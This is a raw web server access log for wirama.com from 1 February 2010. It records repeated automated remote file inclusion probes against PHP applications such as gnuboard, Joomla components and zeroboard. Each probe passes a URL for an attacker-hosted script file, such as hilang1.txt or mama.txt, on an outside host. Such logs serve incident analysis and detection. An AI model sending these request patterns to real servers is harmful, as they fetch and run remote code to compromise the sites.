221.143.40.35 - - [01/Feb/2010:01:09:44 -0800] "GET /skin/ggambo6200_gallery//ask_password.php?dir=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
221.143.40.35 - - [01/Feb/2010:01:09:44 -0800] "GET /logs/access_090601.log//skin/ggambo6200_gallery//ask_password.php?dir=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
221.143.40.35 - - [01/Feb/2010:01:09:44 -0800] "GET /logs//skin/ggambo6200_gallery//ask_password.php?dir=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
221.143.40.35 - - [01/Feb/2010:01:10:13 -0800] "GET /logs/access_090331.log//skin/ggambo6200_gallery//ask_password.php?dir=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.217.5.166 - - [01/Feb/2010:01:10:45 -0800] "GET /logs//setup/header.php?css_path=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.217.5.166 - - [01/Feb/2010:01:10:45 -0800] "GET /logs/access_090329.log//setup/header.php?css_path=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.217.5.166 - - [01/Feb/2010:01:10:45 -0800] "GET /setup/header.php?css_path=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.217.5.166 - - [01/Feb/2010:01:10:51 -0800] "GET /logs/access_090329.log//setup/header.php?css_path=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.217.5.166 - - [01/Feb/2010:01:10:51 -0800] "GET /logs//setup/header.php?css_path=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.217.5.166 - - [01/Feb/2010:01:10:51 -0800] "GET /setup/header.php?css_path=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
221.143.40.35 - - [01/Feb/2010:01:11:04 -0800] "GET /logs/access_090701.log//skin/ggambo6200_gallery//ask_password.php?dir=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.217.5.166 - - [01/Feb/2010:01:11:08 -0800] "GET /logs//setup/header.php?css_path=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.217.5.166 - - [01/Feb/2010:01:11:08 -0800] "GET /logs/access_090329.log//setup/header.php?css_path=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.217.5.166 - - [01/Feb/2010:01:11:08 -0800] "GET /setup/header.php?css_path=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.217.5.166 - - [01/Feb/2010:01:11:46 -0800] "GET /logs/access_090329.log//setup/header.php?css_path=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.217.5.166 - - [01/Feb/2010:01:11:46 -0800] "GET /logs//setup/header.php?css_path=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.217.5.166 - - [01/Feb/2010:01:11:46 -0800] "GET /setup/header.php?css_path=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:01:12:09 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.orosfm.com.br/player/Scripts/mama.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:01:12:10 -0800] "GET /logs/access_091201.log/convert/mvcw.php?step=1&vwar_root=http://www.orosfm.com.br/player/Scripts/mama.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:01:12:10 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.orosfm.com.br/player/Scripts/mama.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:01:12:25 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.orosfm.com.br/player/Scripts/mama.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:01:12:27 -0800] "GET /logs/access_091201.log/convert/mvcw.php?step=1&vwar_root=http://www.orosfm.com.br/player/Scripts/mama.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:01:12:27 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.orosfm.com.br/player/Scripts/mama.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.217.5.166 - - [01/Feb/2010:01:13:05 -0800] "GET /logs/access_090329.log//setup/header.php?css_path=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.217.5.166 - - [01/Feb/2010:01:13:05 -0800] "GET /logs//setup/header.php?css_path=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.217.5.166 - - [01/Feb/2010:01:13:05 -0800] "GET /setup/header.php?css_path=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
221.143.40.35 - - [01/Feb/2010:01:13:22 -0800] "GET /logs/access_090801.log%20%20//skin/ggambo6200_gallery//ask_password.php?dir=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
221.143.40.35 - - [01/Feb/2010:01:13:22 -0800] "GET /logs//skin/ggambo6200_gallery//ask_password.php?dir=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
221.143.40.35 - - [01/Feb/2010:01:13:22 -0800] "GET /skin/ggambo6200_gallery//ask_password.php?dir=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
125.141.91.138 - - [01/Feb/2010:01:14:50 -0800] "GET /logs/access_090901.log/convert/mvcw.php?step=1&vwar_root=http://www.orosfm.com.br/player/Scripts/mama.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:01:14:51 -0800] "GET /logs/access_090901.log/convert/mvcw.php?step=1&vwar_root=http://www.orosfm.com.br/player/Scripts/mama.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
65.55.230.157 - - [01/Feb/2010:01:17:40 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/4.0" "wirama.com"
65.55.230.157 - - [01/Feb/2010:01:17:41 -0800] "GET /_private/form_results.csv HTTP/1.1" 200 0 "-" "Mozilla/4.0" "wirama.com"
118.217.5.166 - - [01/Feb/2010:01:18:10 -0800] "GET /logs/access_090329.log%20%20//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
118.217.5.166 - - [01/Feb/2010:01:18:10 -0800] "GET /logs//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
118.217.5.166 - - [01/Feb/2010:01:18:10 -0800] "GET /image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
118.217.5.166 - - [01/Feb/2010:01:18:31 -0800] "GET /logs/access_090329.log%20%20//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
118.217.5.166 - - [01/Feb/2010:01:18:31 -0800] "GET /logs//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
118.217.5.166 - - [01/Feb/2010:01:18:31 -0800] "GET /image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
118.217.5.166 - - [01/Feb/2010:01:18:52 -0800] "GET /logs/access_090329.log%20%20//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
118.217.5.166 - - [01/Feb/2010:01:18:52 -0800] "GET /logs//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
118.217.5.166 - - [01/Feb/2010:01:18:52 -0800] "GET /image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
118.217.5.166 - - [01/Feb/2010:01:20:15 -0800] "GET /logs/access_090329.log%20%20//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
118.217.5.166 - - [01/Feb/2010:01:20:15 -0800] "GET /logs//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
118.217.5.166 - - [01/Feb/2010:01:20:15 -0800] "GET /image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
94.124.120.47 - - [01/Feb/2010:01:20:30 -0800] "GET /logs//gnuboard4/bbs/write_update.php?board_skin_path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "wirama.com"
94.124.120.47 - - [01/Feb/2010:01:20:30 -0800] "GET /gnuboard4/bbs/write_update.php?board_skin_path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "wirama.com"
94.124.120.47 - - [01/Feb/2010:01:20:30 -0800] "GET /gnuboard4/bbs/write_update.php?board_skin_path=http://www.pulsanim-interactive.fr/sql??&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "wirama.com"
94.124.120.47 - - [01/Feb/2010:01:20:31 -0800] "GET /logs//gnuboard4/bbs/write_update.php?board_skin_path=http://www.pulsanim-interactive.fr/sql??&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "wirama.com"
58.150.99.131 - - [01/Feb/2010:01:27:07 -0800] "GET /bbs/skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:01:27:07 -0800] "GET /logs/access_091101.log//bbs/skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:01:27:07 -0800] "GET /logs//bbs/skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:01:27:19 -0800] "GET /logs/access_091101.log//bbs/skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:01:27:19 -0800] "GET /bbs/skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:01:27:19 -0800] "GET /logs//bbs/skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
151.8.79.19 - - [01/Feb/2010:01:27:38 -0800] "GET /logs/access_090801.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
118.217.5.166 - - [01/Feb/2010:01:28:29 -0800] "GET /logs/access_090331.log//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.217.5.166 - - [01/Feb/2010:01:28:29 -0800] "GET /logs//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.217.5.166 - - [01/Feb/2010:01:28:29 -0800] "GET /image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.217.5.166 - - [01/Feb/2010:01:29:12 -0800] "GET /logs/access_090601.log//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:01:29:15 -0800] "GET /logs/access_091201.log//bbs/skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:01:29:40 -0800] "GET /logs/access_091201.log//bbs/skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.28.184.15 - - [01/Feb/2010:01:32:58 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.28.184.15 - - [01/Feb/2010:01:32:58 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.28.184.15 - - [01/Feb/2010:01:32:58 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.28.184.15 - - [01/Feb/2010:01:33:04 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.28.184.15 - - [01/Feb/2010:01:33:04 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.28.184.15 - - [01/Feb/2010:01:33:04 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.28.184.15 - - [01/Feb/2010:01:33:04 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.28.184.15 - - [01/Feb/2010:01:33:05 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.28.184.15 - - [01/Feb/2010:01:33:05 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.28.184.15 - - [01/Feb/2010:01:33:05 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.28.184.15 - - [01/Feb/2010:01:33:05 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.28.184.15 - - [01/Feb/2010:01:33:06 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
118.217.5.166 - - [01/Feb/2010:01:34:26 -0800] "GET /logs/access_090329.log//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.28.184.15 - - [01/Feb/2010:01:34:39 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.28.184.15 - - [01/Feb/2010:01:34:39 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.28.184.15 - - [01/Feb/2010:01:34:39 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.28.184.15 - - [01/Feb/2010:01:35:09 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.28.184.15 - - [01/Feb/2010:01:35:09 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.28.184.15 - - [01/Feb/2010:01:35:09 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.217.5.166 - - [01/Feb/2010:01:35:25 -0800] "GET /logs/access_090331.log//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.217.5.166 - - [01/Feb/2010:01:35:25 -0800] "GET /logs//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.217.5.166 - - [01/Feb/2010:01:35:25 -0800] "GET /image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.28.184.15 - - [01/Feb/2010:01:35:28 -0800] "GET /logs/access_100101.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.217.5.166 - - [01/Feb/2010:01:35:35 -0800] "GET /logs/access_090601.log//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.28.184.15 - - [01/Feb/2010:01:35:37 -0800] "GET /logs/access_100101.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.217.5.166 - - [01/Feb/2010:01:35:50 -0800] "GET /logs//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.217.5.166 - - [01/Feb/2010:01:35:50 -0800] "GET /image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.217.5.166 - - [01/Feb/2010:01:35:50 -0800] "GET /logs/access_090601.log//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.217.5.166 - - [01/Feb/2010:01:36:29 -0800] "GET /logs//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.217.5.166 - - [01/Feb/2010:01:36:29 -0800] "GET /image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.217.5.166 - - [01/Feb/2010:01:36:29 -0800] "GET /logs/access_090331.log//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.217.5.166 - - [01/Feb/2010:01:37:14 -0800] "GET /logs/access_090601.log//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
147.46.233.192 - - [01/Feb/2010:01:38:35 -0800] "GET /administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.czasnowejery.pl//administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
147.46.233.192 - - [01/Feb/2010:01:38:51 -0800] "GET /logs/access.log//administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.czasnowejery.pl//administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
147.46.233.192 - - [01/Feb/2010:01:38:56 -0800] "GET /logs//administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.czasnowejery.pl//administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.28.184.15 - - [01/Feb/2010:01:39:40 -0800] "GET /?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
193.28.184.15 - - [01/Feb/2010:01:39:40 -0800] "GET /logs/access_091031.log//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.28.184.15 - - [01/Feb/2010:01:39:40 -0800] "GET /logs//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3946 "-" "Mozilla/5.0" "www.wirama.com"
118.217.5.166 - - [01/Feb/2010:01:40:21 -0800] "GET /logs/access_090329.log//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
147.46.233.192 - - [01/Feb/2010:01:40:28 -0800] "GET /logs//administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.czasnowejery.pl//administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
147.46.233.192 - - [01/Feb/2010:01:40:28 -0800] "GET /administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.czasnowejery.pl//administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
147.46.233.192 - - [01/Feb/2010:01:40:28 -0800] "GET /logs/access.log//administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.czasnowejery.pl//administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.28.184.15 - - [01/Feb/2010:01:41:51 -0800] "GET /logs/access_091031.log//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.28.184.15 - - [01/Feb/2010:01:41:51 -0800] "GET /?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
193.28.184.15 - - [01/Feb/2010:01:41:51 -0800] "GET /logs//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3946 "-" "Mozilla/5.0" "www.wirama.com"
118.217.5.166 - - [01/Feb/2010:01:42:01 -0800] "GET /logs/access_090329.log//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
118.217.5.166 - - [01/Feb/2010:01:42:05 -0800] "GET /logs/access_090329.log//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
118.217.5.166 - - [01/Feb/2010:01:52:53 -0800] "GET /logs/access_090329.log%20%20//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/ikhy1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
118.217.5.166 - - [01/Feb/2010:01:52:53 -0800] "GET /logs//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/ikhy1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
118.217.5.166 - - [01/Feb/2010:01:52:53 -0800] "GET /image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/ikhy1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
